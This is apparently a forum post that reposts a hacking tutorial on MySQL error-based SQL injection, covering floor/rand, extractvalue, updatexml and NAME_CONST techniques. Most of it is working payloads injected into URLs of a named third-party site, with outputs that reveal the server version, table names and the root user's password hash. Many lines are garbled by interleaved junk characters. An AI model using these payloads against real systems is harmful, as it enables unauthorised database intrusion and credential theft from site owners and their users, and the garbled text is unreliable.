|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
) U; @2 h3 d; f* D$ ?首先进行正常查询: mysql> select * from article where id = 1;9 E5 v: L0 M3 ?' A( w5 J
+—-+——-+———+; X" E! j8 _. i, X7 A4 `9 D) m* k+ G
| id | title | content |& |5 m) r- ]! a( t6 O4 ~7 `
+—-+——-+———+
1 `- T( J* N9 X0 v& z7 C| 1 | test | do it |) H8 c' M6 }% n2 f. E
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);4 v. U c0 F3 z0 L; H3 C
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。# z" Q& e4 r1 S* r ?
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);% v1 q& Y8 b) s6 q4 r D) W+ V# y. n
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
) x2 C2 [" W) h0 j: S* z% Y' _- u3 K- v. wERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue$ o; e& e" n: \) d: s& n4 R# f% W4 w
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));– ^8 N: @3 l& r
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ $ Q$ V% D/ `; K5 t5 }( J
% s" I* S& p+ l K
再收集:
& N' {, g, [# T- n3 _http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 1 t v+ d' n9 g( u
. D2 K$ E* z' D" ?$ d) sError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’5 f6 z4 K6 ~8 A- n4 Q$ A9 P
$ a; s' ~4 W" k5 {
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 V: _8 d, e' `
, X! M7 V3 \6 I" hErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ - z' W! Z% G9 W. T& K+ \' ]
8 e V' V7 K; O5 S$ n4 a$ } H
MYSQL高版本报错注入技巧-利用NAME_CONST注入( B/ u1 v/ k/ y" c1 @
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 9 s) L3 ?$ z/ @. e) J
! K. k3 M0 I$ m) c
3 t6 J+ W# _; |6 h: \# c5 }, M相关信息9 e1 ^% t0 I! p) a v) c
- e' r' f' y. z, H% R
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.) w: |7 ^5 x& [: b
2 z% I( N* S/ R: Z% p9 E* v
Code:; x' E9 P7 ]' y. Y* g* C
NAME_CONST(DATA, VALUE)! a( ^/ o0 ^3 `( Q* |6 X
5 s. B( o" `& L8 R) o! f
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
" x. u: ~9 P& U
0 }* _0 d" g9 v& G# @SELECT NAME_CONST('TEST', 1)
7 b' A- H( B3 K8 j/ C) R& j: G# t4 \
/ r( {" ]. F1 L/ e7 J
/ }+ _7 y( P; f9 j|---------------|
1 T I( I) f$ ]& S% ]7 J+ C| TEST |
( p* s2 J5 q7 f% C# R. d| |! E5 `2 {6 @ j* A8 [/ Q- f
|---------------|
- r' N Y! k. q0 ^2 K$ N| 1 |
" g4 J0 P2 q* ?- [: n| |6 {& t) n4 @; ?+ N: z" H- `0 b
|---------------|/ ~' S! C+ H4 x. r) T+ d% g
8 d9 H9 K' }8 \6 L
6 e6 v: g5 E% v0 E$ e+ t
4 x8 G7 B7 l' k5 j; T0 o9 b
0 W+ T- L. w* }! n* _" v4 w
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
' T) D& x1 T! n# _4 ~. G# ~Intro to MySQL Variables
! Q3 ~: s, p, J# d
/ E. F1 Q4 \/ _5 x5 m; M, d5 HOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.0 H; c* g+ {* H" r7 X
5 K2 n* E- Y" G6 o7 c$ m
Code:1 T! I7 J( f+ [9 k6 J: n
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
8 }% R' z2 ]+ }. l+ d6 h! H5 Y$ [! }
4 F$ o/ W! w- ^3 i) n
, s& R2 J+ r1 E9 W. X' w& J2 c) Y% n9 W
4 G0 j/ |* S1 X) l' S6 c, wCode:4 o$ V- F3 X& n8 s% ^
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--# @( l' t) _; d; H; Z" {
+ p; n' ?( c* o) i$ J- J
0 F" \. I. C! Y& w9 C0 s( E: ~. {
VAR = Your MySQL variable.! P0 D) e/ ~1 j' T- c/ B
4 S: E, U( k$ K0 v& V
MySQL 5.1.3 Server System Variables# N" R& \& B6 D* S' ]
) q5 x( `" w U2 b# i. y3 s
Let's try it out on my site..: {9 O$ ?$ V' K# h5 }
5 M' D( L' H# @2 C% T# T4 FCode:
. R4 A/ `; K. M0 M% `http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
( {) j2 e, L1 L" l a0 d6 X$ O
+ s- i" Y6 n* ?7 n6 c. ^Erroruplicate column name '5.0.27-community-nt'
' `0 f- s' r0 J! D: M# i/ Z
5 A. A+ r% h( C j- W& @
7 O9 I8 @8 Z+ Y1 x+ R% `: D5 K6 X- C- V8 T
* F& _) O4 K. R/ m" G4 v2 w
/ o# h" P' H* L+ N7 X2 [/ XNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...- Z, W. X, D- _- M- l, s; n
3 X- Y; F- d) k& K) U4 o/ r
Data Extraction
# V6 D! j, Y; `5 C! d0 ^; n X1 W; S, j
Code:
' q- }/ S* T: U% _1 k: T7 ^+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--1 s) Q3 _ N: n& [$ W2 O s
5 t8 g2 T. s/ J( N- o8 M
- w; O6 B' h( i. p& G) VWe should get a duplicate column 1 error...) B$ X& |. t7 X0 Y
7 h2 i. U9 n( |% C) o* FCode:1 o. k' q) r! w1 W, U% \; E$ X
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
( ~* ?* {9 E- G2 a, D8 Y0 H) P6 F. N# _6 f+ k
Erroruplicate column name '1
6 W- F O8 x4 K( I4 B5 B5 ]5 {$ t) f
5 B: ? \+ n( Y8 Y' e8 q8 i& q& R* Q! x) G' \" e
% D; U; _" m0 H p7 N
( }+ H! a! t7 s) I2 j# m E
7 b! | M. [$ v l2 D' C; H4 s
% o. ? g# ~, y- LNow let's get the tables out this bitch..
% F5 G3 K0 X: o4 K# Z6 \: n5 `( M- y( |$ s% l
Code:
$ w0 E7 ]# n8 X$ n+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--5 @' o1 Q7 C, Y/ G# @
7 B; W o8 L& K& c
9 M! I W9 ?) K5 xLet's see if it works here, if it does, we can go on and finish the job.
. ?! J9 G0 d: Q/ o; W% ^ \! t: B* Z( z6 K' q, Z
Code:
& f3 o, |* q* w; r, b6 fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% V \5 m4 \* e9 u; \. g9 M
2 \, R1 H# N; h8 J) m
, J! {6 k3 Y2 G- w5 k" }" kErroruplicate column name 'com_admanage1 C3 ]- |' H7 J: }1 q+ T
, g! h. k* |$ }* W; ?/ |. A" g" D* G6 Z8 _" _! P2 \& R2 \
; [. u' ]: G: e- b9 g: D M& K; G+ T
! E" y8 `& B' h/ ?
9 t H1 t% L* {8 D$ a
K9 q1 R: O0 t! H
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
. r0 @" s% L) b, ` ^, T; z
% b# B" }5 R+ o# v I4 pLet's get the columns out of the user table..
. i, f/ D( V+ G2 F' s- a
/ o; @! h* D( ZCode:
* F- J. c5 u" N( m+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--& R6 Q$ i! e5 I( [: ?$ L" W
" F4 g) L" O. W8 m9 e% r9 a* u, i: W9 B4 Z2 z# O
So mine looks like this, and I get the duplicate column name 'Host'.) [3 _" l7 ]9 `+ N) m8 Y6 i
- u0 ]8 `* Y4 I
Code: U Z; v9 ^6 S8 Z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
2 Q( n! a) p* i5 p: ^0 ?8 U! q+ B$ z! U' [7 C
Erroruplicate column name 'Host'
# D! h( _6 g/ j. b3 V5 f) a9 A. |5 h% d" G; o5 w5 X
- Y4 o0 a3 @/ \ T. W' _
/ x) h4 q/ |* q* T/ e" x& \# d
. ^2 v- B, H h! _- R+ P. u8 t
: u, c) {( |0 F; f
8 c5 E" e8 Y/ D8 g4 T+ w& W$ GWoot, time to finish this bitch off.$ N8 I9 ]4 t3 W9 {% h$ T
! Q0 \8 _4 q6 E% X0 k" f
Code:
/ m7 w( [4 g6 C; a$ f+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
8 d1 W' A! _& z: D4 ?
) e" Q9 I+ Y% e7 L& t- e* E7 t+ p. Z( O+ A5 Q) o+ L
So mine looks like this...
$ y5 Y( ]1 w: Y( U' t% W, ~4 B4 m2 g" w
Code:
$ T- C) D, G( {! l! y! Xhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--& I! x1 f. y2 o, @- l
; _& D+ u! R2 J: P7 @Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
, q f, X8 }7 r$ Y% o- O0 v9 Q, ]9 Q2 X. g: S# A
+ ^# `7 T4 x$ h6 s0 P/ b
- \- d7 H0 c5 e( N* |; X4 Z) X( z8 u' w8 t% w$ F/ \
0 C2 a7 }, s2 l2 _( t6 D& {. a
( M3 ?& O2 ]" mAnd there we have it, thanks for reading.
3 m+ G/ M7 {; H8 l7 N) F, M4 k' _2 N: h X( r: g+ F
|
发表于 2015-11-11 19:03:37
收藏
支持
反对